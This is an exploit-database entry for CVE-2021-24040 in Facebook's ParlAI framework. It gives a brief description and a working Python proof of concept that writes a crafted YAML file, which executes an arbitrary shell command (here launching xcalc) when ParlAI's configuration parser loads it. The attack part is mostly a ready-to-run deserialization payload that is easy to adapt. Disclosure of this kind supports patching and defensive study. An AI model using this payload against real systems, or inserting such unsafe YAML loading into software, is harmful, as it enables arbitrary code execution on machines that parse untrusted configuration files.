Exploit for Facebook ParlAI 1.0.0 Code Execution / Deserialization CVE-2021-24040

## https://sploitus.com/exploit?id=PACKETSTORM:164136
# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai  
# Date: 2021-09-11  
# Exploit Author: Abhiram V  
# Vendor Homepage: https://parl.ai/  
# Software Link: https://github.com/facebookresearch/ParlAI  
# Version: < 1.1.0  
# Tested on: Linux  
# CVE: CVE-2021-24040  
# References :   
# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg  
# | https://anon-artist.github.io/blogs/blog3.html |  
  
############################################################################  
  
Introduction  
ParlAI (pronounced “par-lay”) is a free, open-source python framework for  
sharing, training and evaluating AI models on a variety of openly available  
dialogue datasets.  
  
############################################################################  
  
Vulnerability details  
  
############################################################################  
  
Description  
ParlAI was vulnerable to YAML deserialization attack caused by unsafe  
loading which leads to Arbitrary Code Execution.  
  
Proof of Concept  
  
Create the following PoC file (exploit.py)  
  
import os  
#os.system('pip3 install parlai')  
from parlai.chat_service.utils import config  
exploit = """!!python/object/new:type  
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]  
listitems: "__import__('os').system('xcalc')"  
"""  
open('config.yml','w+').write(exploit)  
config.parse_configuration_file('config.yml')  
  
Execute the python script ie, python3 exploit.py  
  
Impact  
Code Execution  
  
############################################################################